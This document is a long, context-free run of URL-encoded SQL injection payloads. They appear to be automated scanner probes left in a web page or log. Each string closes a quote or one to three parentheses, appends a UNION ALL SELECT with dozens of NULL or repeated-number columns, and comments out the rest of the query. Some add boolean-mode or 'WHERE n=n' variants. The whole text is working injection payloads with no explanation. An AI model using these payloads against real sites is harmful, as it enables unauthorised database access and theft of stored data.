1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -8267%29%20UNION%20ALL%20SELECT%206698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698%2C6698--%20 -5694%29%20UNION%20ALL%20SELECT%202449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449%2C2449--%20 -8425%29%20UNION%20ALL%20SELECT%203879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879%2C3879--%20 -9200%29%20UNION%20ALL%20SELECT%207133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133%2C7133--%20 -7336%29%20UNION%20ALL%20SELECT%201241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241%2C1241--%20 -3986%29%20UNION%20ALL%20SELECT%209785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785%2C9785--%20 -7727%29%20UNION%20ALL%20SELECT%201742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742%2C1742--%20 -7106%29%20UNION%20ALL%20SELECT%205055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055%2C5055--%20 -9024%29%20UNION%20ALL%20SELECT%207062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062%2C7062--%20 -2952%29%20UNION%20ALL%20SELECT%205708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708%2C5708--%20 -5555%29%20UNION%20ALL%20SELECT%202520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520%2C2520--%20 -1204%29%20UNION%20ALL%20SELECT%203482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482--%20 -4545%29%20UNION%20ALL%20SELECT%208028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028%2C8028--%20 -3220%29%20UNION%20ALL%20SELECT%203676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676%2C3676--%20 -4053%29%20UNION%20ALL%20SELECT%207688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688%2C7688--%20 -4433%29%20UNION%20ALL%20SELECT%205821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821%2C5821--%20 -1109%29%20UNION%20ALL%20SELECT%206733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733%2C6733--%20 -5937%29%20UNION%20ALL%20SELECT%209292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292%2C9292--%20 -7755%29%20UNION%20ALL%20SELECT%205856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856%2C5856--%20 -1530%29%20UNION%20ALL%20SELECT%206870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870%2C6870--%20 -5641%29%29%20UNION%20ALL%20SELECT%203994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994%2C3994--%20 -8812%29%29%20UNION%20ALL%20SELECT%203837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837%2C3837--%20 -1527%29%29%20UNION%20ALL%20SELECT%202955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955%2C2955--%20 -1971%29%29%20UNION%20ALL%20SELECT%209543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543%2C9543--%20 -7444%29%29%20UNION%20ALL%20SELECT%203007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007%2C3007--%20 -5435%29%29%20UNION%20ALL%20SELECT%207724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724%2C7724--%20 -8463%29%29%20UNION%20ALL%20SELECT%202801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801%2C2801--%20 -7471%29%29%20UNION%20ALL%20SELECT%208902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902%2C8902--%20 -5172%29%29%20UNION%20ALL%20SELECT%207340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340%2C7340--%20 -1153%29%29%20UNION%20ALL%20SELECT%205403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403%2C5403--%20 -1155%29%29%29%20UNION%20ALL%20SELECT%208907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907%2C8907--%20 -5406%29%29%29%20UNION%20ALL%20SELECT%201322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322%2C1322--%20 -8804%29%29%29%20UNION%20ALL%20SELECT%208224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224%2C8224--%20 -8922%29%29%29%20UNION%20ALL%20SELECT%204535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535%2C4535--%20 -1232%29%29%29%20UNION%20ALL%20SELECT%204980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980%2C4980--%20 -6054%29%29%29%20UNION%20ALL%20SELECT%207844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844%2C7844--%20 -7186%29%29%29%20UNION%20ALL%20SELECT%207565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565%2C7565--%20 -2999%29%29%29%20UNION%20ALL%20SELECT%202347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347%2C2347--%20 -6610%29%29%29%20UNION%20ALL%20SELECT%209774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774%2C9774--%20 -5387%29%29%29%20UNION%20ALL%20SELECT%201337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337%2C1337--%20 -4770%20UNION%20ALL%20SELECT%207305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305%2C7305--%20 -7796%20UNION%20ALL%20SELECT%206719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719%2C6719--%20 -9791%20UNION%20ALL%20SELECT%205947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947%2C5947--%20 -4792%20UNION%20ALL%20SELECT%204984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984%2C4984--%20 -3471%20UNION%20ALL%20SELECT%207757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757%2C7757--%20 -4179%20UNION%20ALL%20SELECT%207223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223%2C7223--%20 -7653%20UNION%20ALL%20SELECT%206380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380%2C6380--%20 -6117%20UNION%20ALL%20SELECT%207634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634%2C7634--%20 -5395%20UNION%20ALL%20SELECT%207010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010%2C7010--%20 -5480%20UNION%20ALL%20SELECT%201329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329%2C1329--%20 -6019%29%20WHERE%208090%3D8090%20UNION%20ALL%20SELECT%208090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090%2C8090--%20 -8320%29%20WHERE%202711%3D2711%20UNION%20ALL%20SELECT%202711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711%2C2711--%20 -6870%29%20WHERE%201904%3D1904%20UNION%20ALL%20SELECT%201904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904%2C1904--%20 -7866%29%20WHERE%209756%3D9756%20UNION%20ALL%20SELECT%209756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756%2C9756--%20 -7606%29%20WHERE%205633%3D5633%20UNION%20ALL%20SELECT%205633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633%2C5633--%20 